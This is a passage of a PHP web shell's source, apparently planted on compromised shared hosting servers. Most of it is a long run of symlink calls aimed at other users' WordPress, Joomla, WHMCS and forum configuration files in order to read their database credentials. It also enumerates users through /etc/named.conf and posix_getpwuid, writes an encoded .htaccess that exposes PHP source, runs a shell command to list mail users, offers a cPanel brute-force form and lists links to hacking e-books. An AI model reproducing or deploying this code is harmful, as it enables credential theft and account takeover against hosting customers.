e/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t}\r\n\r\n\t\t\t\t$d0mains = @file("/etc/named.conf");\r\n\t\t\r\n\t\t\t\tif($d0mains)\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tforeach($d0mains as $d0main)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(eregi("zone",$d0main))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n\t\t\t\t\t\t\tflush();\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(strlen(trim($domains[1][0])) > 2)\r\n\t\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\t$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tsyml($user[\'name\'],$domains[1][0]);\t\t\t\t\t\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t$temp = "";\r\n\t\t\t\t\t$val1 = 0;\r\n\t\t\t\t\t$val2 = 1000;\r\n\t\t\t\t\tfor(;$val1 <= $val2;$val1++) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$uid = @posix_getpwuid($val1);\r\n\t\t\t\t\t\tif ($uid)\r\n\t\t\t\t\t\t\t$temp .= join(\':\',$uid)."\\n";\r\n\t\t\t\t\t }\r\n\t\t\t\t\t echo \'<br/>\';\r\n\t\t\t\t\t $temp = trim($temp);\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file5 = fopen("test.txt","w");\r\n\t\t\t\t\t fputs($file5,$temp);\r\n\t\t\t\t\t fclose($file5);\r\n\r\n$htaccess =\r\n\'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh\r\naW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp\r\nbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=\r\n\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file = fopen("test.txt", "r") or exit("Unable to open file!");\r\n\t\t\t\t\t while(!feof($file))\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\t$s = fgets($file);\r\n\t\t\t\t\t\t$matches = array();\r\n\t\t\t\t\t\t$t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);\r\n\t\t\t\t\t\t$matches = str_replace("home/","",$matches[1]);\r\n\t\t\t\t\t\tif(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\tsyml($matches,$matches);\r\n\t\t\t\t\t }\r\n\t\t\t\t\tfclose($file);\r\n\t\t\t\t\techo "</table>";\r\n\t\t\t\t\tunlink("test.txt");\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\n?>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="page" type="hidden" value="find"><table>      \t\t\t\t\r\n    </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>\r\n    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t<tr>\r\n\t<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>\r\n    <tr>\r\n    <td>\r\n    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>User :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="usernames"><?php system(\'ls /var/mail\');?></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Pass :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="passwords"></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Type :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n    <span class="style2"><strong>Simple : </strong> </span>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>\r\n    <font class="style2"><strong>/etc/passwd : </strong> </font>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>\r\n\t</strong>\r\n\t</span>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class =\'inputzbut\' type="submit" value="start">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form> \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="mendapatkan" type="hidden" value="passwd">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="foldername" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>   \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="pass" type="hidden" value="password">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="url" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>\r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info \r\n\tSecurity</strong></td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<?php\r\n$safe_mode = ini_get(\'safe_mode\');\r\nif($safe_mode==\'1\')\r\n{\r\necho \'ON\';\r\n}else{\r\necho \'OFF\';\r\n}\r\n\r\n?>\t\r\n\t</strong>\t\r\n\t</td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="matikan" type="hidden" value="sekatan">        \t\t\t\t\r\n    </strong>\r\n\r\n<?php\r\nif(\'\'==($func=@ini_get(\'disable_functions\')))\r\n{\r\necho "<font color=#00ff00>No Security for Function</font></b>";\r\n}else{\r\necho \'<script>alert("Please see below and press >Please Click Here First!<");</script>\';\r\necho "<font color=red>$func</font></b>";\r\necho \'<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>\';\r\necho \'<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">\r\n    </strong>\r\n    </td></tr>\';\r\n}\r\n?></strong></td></tr></table></table></table>\r\n<?\r\n}\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tutor\'))\r\n    {\r\n    ?>\r\n\t<form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">\r\n\t<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>\r\n\t\t<form method="post" action="">\r\n<table class="tabnet" border="1" >\r\n<tr>\r\n\t\t<td align="center">English</td><td align="center">Indonesian</td>\r\n\t</tr>\r\n\t<tr>\r\n\t\t<td><form method="post" action="">&nbsp;\r\n\tE-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial24" > Hacking Exposed-5 </option>\r\n\t<option value="tutorial25"> Internet Denial Of Service </option>\r\n\t<option value="tutorial26">Computer Viruses For Dummies</option>\r\n\t<option value="tutorial27">Hack Attacks Testing</option>\r\n\t<option value="tutorial28">Secrets Of A Super Hacker</option>\r\n\t<option value="tutorial29">Stealing The Network</option>\r\n\t<option value="tutorial30">Hacker\'s HandBook</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n\t</td></form>\r\n<td><form method="post" action="">&nbsp;\r\nTutorial by X\'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t\t<option value="tutorial2">Search Engine Hacking</option>\r\n\t\t<option value="tutorial3">SQL Injection dengan hackbar</option>\r\n\t\t<option value="tutorial1" >Bypass Union</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nE-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut"  name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="cryptography_for_defeloper">Cryptography for Developer</option>\r\n\t<option value="tutorial31">Mobile Malware Attack and Defense</option>\r\n\t<option value="forensic">CD and DVD Forensic</option>\r\n\t<option value="ddd">Open Sourch Security Tools</option>\r\n\t<option value="metasploit">Metaslpoit Toolkit</option>\r\n\t<option value="stealing_network">Stealing the Network</option>\r\n\t<option value="security_polices">Creating Security Polices</option>\r\n\t</select>\r\n\t<input  type="submit" name="submit" class="inputzbut" value="Download">\r\n</form></td>\r\n<td>\r\n<form method="post" action="">&nbsp;\r\nX-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\r\n\t<select class="inputzbut" name="pilih" id="pilih">\r\n\t<option value=""selected>-----------------[ Select ]-----------------</option>\r\n\t<option value="tutorial4">X-CODE MAGAZINE 1</option>\r\n\t<option value="tutorial5">X-CODE MAGAZINE 2</option>\r\n\t<option value="tutorial6">X-CODE MAGAZINE 3</option>\r\n\t<option value="tutorial7">X-CODE MAGAZINE 4</option>\r\n\t<option value="tutorial8">X-CODE MAGAZINE 5</option>\r\n\t<option value="tutorial9">X-CODE MAGAZINE 6</option>\r\n\t<option value="tutorial10">X-CODE MAGAZINE 7</option>\r\n\t<option value="tutorial11">X-CODE MAGAZINE 8</option>\r\n\t<option value="tutorial12">X-CODE MAGAZINE 9</option>\r\n\t<option value="tutorial13">X-CODE MAGAZINE 10</option>\r\n\t<option value="tutorial14">X-CODE MAGAZINE 11</option>\r\n\t<option value="tutorial15">X-CODE MAGAZINE 12</option>\r\n\t<option value="tutorial16">X-CODE MAGAZINE 13</option>\r\n\t<option value="tutorial17">X-CODE MAGAZINE 14</option>\r\n\t<option value="tutorial18">X-CODE MAGAZINE 15</option>\r\n\t<option value="tutorial19">X-CODE MAGAZINE 16</option>\r\n\t<option value="tutorial20">X-CODE MAGAZINE 17</option>\r\n\t<option value="tutorial21">X-CODE MAGAZINE 18</option>\r\n\t<option value="tutorial22">X-CODE MAGAZINE 19</option>\r\n\t<option value="tutorial23">X-CODE MAGAZINE 20</option>\r\n\t<option value="tutorial024">X-CODE MAGAZINE 21</option>\r\n\t</select>\r\n\t<input type="submit" name="submit" class="inputzbut" value="Download" ></a>\r\n</form></td></tr></table><br><br>\r\n<?php\r\n$submit = $_POST [\'submit\'];\r\nif(isset($submit)) {\r\n\t$pilih = $_POST[\'pilih\'];\r\n\t\tif ( $pilih == \'tutorial1\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial2\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial3\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial4\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_1.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial5\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_2.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial6\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_3.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial7\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_4.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial8\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial9\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_6.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial10\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_7.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial11\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode_magazine_8.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial12\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode9.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial13\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode10.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial14\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/xcode11.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial15\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = 